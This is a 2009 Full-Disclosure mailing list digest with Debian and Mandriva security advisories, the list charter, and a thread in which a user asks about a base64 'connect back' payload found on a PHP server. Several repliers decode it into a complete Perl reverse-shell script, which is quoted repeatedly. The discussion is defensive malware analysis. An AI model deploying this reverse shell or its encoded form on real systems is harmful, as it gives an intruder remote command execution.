Size/MD5 checksum: 271000 1c5024b2fd07ef8c98276afa17fac00b http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_sparc.deb Size/MD5 checksum: 169682 58c18c588e2e09bb97ace63713a8accf http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_sparc.deb Size/MD5 checksum: 378848 1d86c8b4356b8be1cb6a31620469bada http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_sparc.deb Size/MD5 checksum: 491096 672ae9d75e0071ced67518ee05ae3733 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_sparc.deb Size/MD5 checksum: 271146 74514dfa3c95b1afe4388cc31bc4cba5 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_sparc.deb Size/MD5 checksum: 491162 0dbc5d0426b64b4abff5acdabb2c42f0 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJJkSYVAAoJEL97/wQC1SS+Nc4H/2TnDuV0VpsjmK/uRsQx99R/ bUkz4ZcTFzMP5VztCE4gNMy0UmVNyk6mtu87L2Md0JnHWPU3xY7+2ZZFZ6DfjUpQ 7GGwl4DN6y3ge2/F2QIMid3iSolJaXQ2lkj/50OelS/MwTTDNQ6Q5W6SFet40SOr rCRDLQFCW7mgkCPa9v+meXWRy1wuSx6h5UAr6wMIy0Z/20BrQtS+8hyHxOHtxbGQ FhFMa3n6KySUt9JbJ7QipSBxIqn2oTmaNy4AL3W5dpGY7UEoBxQ/67S2hAnhoTZH i7ipu3PQMWX+ov1uyIe3EEQmIQpfyHA3EwKujJNIozI88NeuWdJF18AIbuQrodo= =N+Yn -----END PGP SIGNATURE----- From johnc at grok.org.uk Tue Feb 10 13:30:16 2009 From: johnc at grok.org.uk (John Cartwright) Date: Tue, 10 Feb 2009 13:30:16 +0000 Subject: [Full-disclosure] List Charter Message-ID: <20090210133016.GA25865@grok.org.uk> [Full-Disclosure] Mailing List Charter John Cartwright - Introduction & Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-request at lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation & Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclosure at lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. From staticrez at gmail.com Tue Feb 10 18:23:46 2009 From: staticrez at gmail.com (sr.) Date: Tue, 10 Feb 2009 13:23:46 -0500 Subject: [Full-disclosure] connect back PHP hack Message-ID: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> can anyone tell me what encoding this is? $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; this has to do with old php 4.x.x version with magic quotes enabled. i'm just trying to figure out what the connect back code does. any input is much appreciated. thx, sr. From security at mandriva.com Tue Feb 10 18:14:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Tue, 10 Feb 2009 19:14:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:034 ] squid Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:034 http://www.mandriva.com/security/ _______________________________________________________________________ Package : squid Date : February 10, 2009 Affected: 2008.1, 2009.0 _______________________________________________________________________ Problem Description: Due to an internal error Squid is vulnerable to a denial of service attack when processing specially crafted requests. This problem allows any client to perform a denial of service attack on the Squid service (CVE-2009-0478). The updated packages have been patched to adress this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0478 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 16a8648b21391a385fb98a691ad05850 2008.1/i586/squid-3.0-1.1mdv2008.1.i586.rpm ba61fb27a256c11a53120baf0e32fd94 2008.1/i586/squid-cachemgr-3.0-1.1mdv2008.1.i586.rpm 02c5602fa6a2bf7b1f97de5050a71af5 2008.1/SRPMS/squid-3.0-1.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 22e84fc5aa771bdf9cf1d1192f94a1bf 2008.1/x86_64/squid-3.0-1.1mdv2008.1.x86_64.rpm 340964989d6639ce4d1fb4bd089d0a89 2008.1/x86_64/squid-cachemgr-3.0-1.1mdv2008.1.x86_64.rpm 02c5602fa6a2bf7b1f97de5050a71af5 2008.1/SRPMS/squid-3.0-1.1mdv2008.1.src.rpm Mandriva Linux 2009.0: bf09cfce8db0718009470bff9f680039 2009.0/i586/squid-3.0-8.1mdv2009.0.i586.rpm 0da7251030b5e0912aaf47937562c288 2009.0/i586/squid-cachemgr-3.0-8.1mdv2009.0.i586.rpm 64c0b0ac2cf102141ee7a8ad8747e42d 2009.0/SRPMS/squid-3.0-8.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: d698fd6bf0598af3e4cb42f88dd539be 2009.0/x86_64/squid-3.0-8.1mdv2009.0.x86_64.rpm 874be46833d14b23923150203be90109 2009.0/x86_64/squid-cachemgr-3.0-8.1mdv2009.0.x86_64.rpm 64c0b0ac2cf102141ee7a8ad8747e42d 2009.0/SRPMS/squid-3.0-8.1mdv2009.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJkZiwmqjQ0CJFipgRAmuTAJ974JA6q0e//UvXbBSrmBJ5LSP9FgCg1cOQ OfpIBObBJQgI6D90nrPgjPk= =0O4c -----END PGP SIGNATURE----- From simon at snosoft.com Tue Feb 10 18:35:02 2009 From: simon at snosoft.com (Simon Smith) Date: Tue, 10 Feb 2009 13:35:02 -0500 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <8B4D8A29-4382-464A-9F9F-8D7462840B24@snosoft.com> Can you send me the entire package, I'm interested in whatever it is that was uploaded to your box. On Feb 10, 2009, at 1:23 PM, sr. wrote: > can anyone tell me what encoding this is? > > $ > back_connect > = > "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith simon at snosoft.com -------------------------------------- Subscribe to our blog http://snosoft.blogspot.com From simon at snosoft.com Tue Feb 10 18:34:22 2009 From: simon at snosoft.com (Simon Smith) Date: Tue, 10 Feb 2009 13:34:22 -0500 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <6489C194-A627-438F-B280-E2B2FF4D14F6@snosoft.com> its base64.. #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname - a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); On Feb 10, 2009, at 1:23 PM, sr. wrote: > can anyone tell me what encoding this is? > > $ > back_connect > = > "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith simon at snosoft.com -------------------------------------- Subscribe to our blog http://snosoft.blogspot.com From razishaban at gmail.com Tue Feb 10 18:44:03 2009 From: razishaban at gmail.com (Razi Shaban) Date: Tue, 10 Feb 2009 20:44:03 +0200 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> On Tue, Feb 10, 2009 at 8:23 PM, sr. wrote: > can anyone tell me what encoding this is? > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > Base64, the "==" at the end gives it away. It decrypts to: #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); -- Regards, Razi Shaban From simon at snosoft.com Tue Feb 10 18:51:49 2009 From: simon at snosoft.com (Simon Smith) Date: Tue, 10 Feb 2009 13:51:49 -0500 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> Message-ID: <19801AE5-00A1-4DA8-A017-7988781E9149@snosoft.com> Technically it doesn't decrypt to anything, it decodes. :) On Feb 10, 2009, at 1:44 PM, Razi Shaban wrote: > On Tue, Feb 10, 2009 at 8:23 PM, sr. wrote: >> can anyone tell me what encoding this is? >> >> $ >> back_connect >> = >> "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj >> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR >> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT >> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI >> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi >> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl >> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; >> >> this has to do with old php 4.x.x version with magic quotes enabled. >> i'm just trying to figure out what the connect back code does. >> >> any input is much appreciated. >> >> thx, >> >> sr. >> > > Base64, the "==" at the end gives it away. It decrypts to: > > #!/usr/bin/perl > use Socket; > $cmd= "lynx"; > $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; > $0=$cmd; > $target=$ARGV[0]; > $port=$ARGV[1]; > $iaddr=inet_aton($target) || die("Error: $!\n"); > $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); > $proto=getprotobyname('tcp'); > socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); > connect(SOCKET, $paddr) || die("Error: $!\n"); > open(STDIN, ">&SOCKET"); > open(STDOUT, ">&SOCKET"); > open(STDERR, ">&SOCKET"); > system($system); > close(STDIN); > close(STDOUT); > close(STDERR); > > -- > > Regards, > Razi Shaban > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith simon at snosoft.com -------------------------------------- Subscribe to our blog http://snosoft.blogspot.com From razishaban at gmail.com Tue Feb 10 18:58:08 2009 From: razishaban at gmail.com (Razi Shaban) Date: Tue, 10 Feb 2009 20:58:08 +0200 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <19801AE5-00A1-4DA8-A017-7988781E9149@snosoft.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> <19801AE5-00A1-4DA8-A017-7988781E9149@snosoft.com> Message-ID: <2d792fb20902101058ic836801h236e5a5a286cfb72@mail.gmail.com> On Tue, Feb 10, 2009 at 8:51 PM, Simon Smith wrote: > Technically it doesn't decrypt to anything, it decodes. :) > > According to the Federal Standard 1037C, the National Information Systems Security Glossary, and the Department of Defense Dictionary of Military and Associated Terms: "In telecommunications, the term decrypt has the following meanings: 1. [A] generic term encompassing decode and decipher. 2. To convert encrypted text into its equivalent plaintext by means of a cryptosystem. " So no, I mean decrypt. Regards, Razi Shaban From w3bd3vil at gmail.com Tue Feb 10 18:54:15 2009 From: w3bd3vil at gmail.com (webDEViL) Date: Wed, 11 Feb 2009 00:24:15 +0530 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> Message-ID: <8656dcd50902101054i29f9955bydcbda607e013a8f5@mail.gmail.com> Must be off the r57 php shell. Regards, webDEViL On Wed, Feb 11, 2009 at 12:14 AM, Razi Shaban wrote: > On Tue, Feb 10, 2009 at 8:23 PM, sr. wrote: > > can anyone tell me what encoding this is? > > > > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > > > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > > > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > > > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > > > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > > > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > > > this has to do with old php 4.x.x version with magic quotes enabled. > > i'm just trying to figure out what the connect back code does. > > > > any input is much appreciated. > > > > thx, > > > > sr. > > > > Base64, the "==" at the end gives it away. It decrypts to: > > #!/usr/bin/perl > use Socket; > $cmd= "lynx"; > $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; > $0=$cmd; > $target=$ARGV[0]; > $port=$ARGV[1]; > $iaddr=inet_aton($target) || die("Error: $!\n"); > $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); > $proto=getprotobyname('tcp'); > socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); > connect(SOCKET, $paddr) || die("Error: $!\n"); > open(STDIN, ">&SOCKET"); > open(STDOUT, ">&SOCKET"); > open(STDERR, ">&SOCKET"); > system($system); > close(STDIN); > close(STDOUT); > close(STDERR); > > -- > > Regards, > Razi Shaban > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090211/ab307bb4/attachment.html From ricky at rzhou.org Tue Feb 10 18:36:47 2009 From: ricky at rzhou.org (Ricky Zhou) Date: Tue, 10 Feb 2009 13:36:47 -0500 Subject: [Full-disclosure] [SPAM] Re: connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <20090210183647.GF25767@sphe.res.cmu.edu> On 2009-02-10 01:23:46 PM, sr. wrote: > can anyone tell me what encoding this is? > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. It is base64 encoded. If you google base64 decode, you can find some tools tools for decoding it. Thanks, Ricky -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/b0b03c9b/attachment.bin From simon at snosoft.com Tue Feb 10 19:05:49 2009 From: simon at snosoft.com (Simon Smith) Date: Tue, 10 Feb 2009 14:05:49 -0500 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <2d792fb20902101058ic836801h236e5a5a286cfb72@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> <19801AE5-00A1-4DA8-A017-7988781E9149@snosoft.com> <2d792fb20902101058ic836801h236e5a5a286cfb72@mail.gmail.com> Message-ID: <69963D7C-3D6D-48EA-9F81-580E0AF0608B@snosoft.com> Damn you! I hate being wrong! I'm going to go stand in my corner and pout now. On Feb 10, 2009, at 1:58 PM, Razi Shaban wrote: > On Tue, Feb 10, 2009 at 8:51 PM, Simon Smith > wrote: >> Technically it doesn't decrypt to anything, it decodes. :) >> >> > > > According to the Federal Standard 1037C, the National Information > Systems Security Glossary, and the Department of Defense Dictionary of > Military and Associated Terms: > > "In telecommunications, the term decrypt has the following meanings: > > 1. [A] generic term encompassing decode and decipher. > > 2. To convert encrypted text into its equivalent plaintext by means of > a cryptosystem. " > > > > > So no, I mean decrypt. > > > Regards, > Razi Shaban Simon Smith simon at snosoft.com -------------------------------------- Subscribe to our blog http://snosoft.blogspot.com From anastasiosm at gmail.com Tue Feb 10 19:23:56 2009 From: anastasiosm at gmail.com (Anastasios Monachos) Date: Tue, 10 Feb 2009 19:23:56 +0000 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <8d90bdd80902101123n79c9164cr59940b424795285a@mail.gmail.com> It looks like base64, the decoded output is: #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); 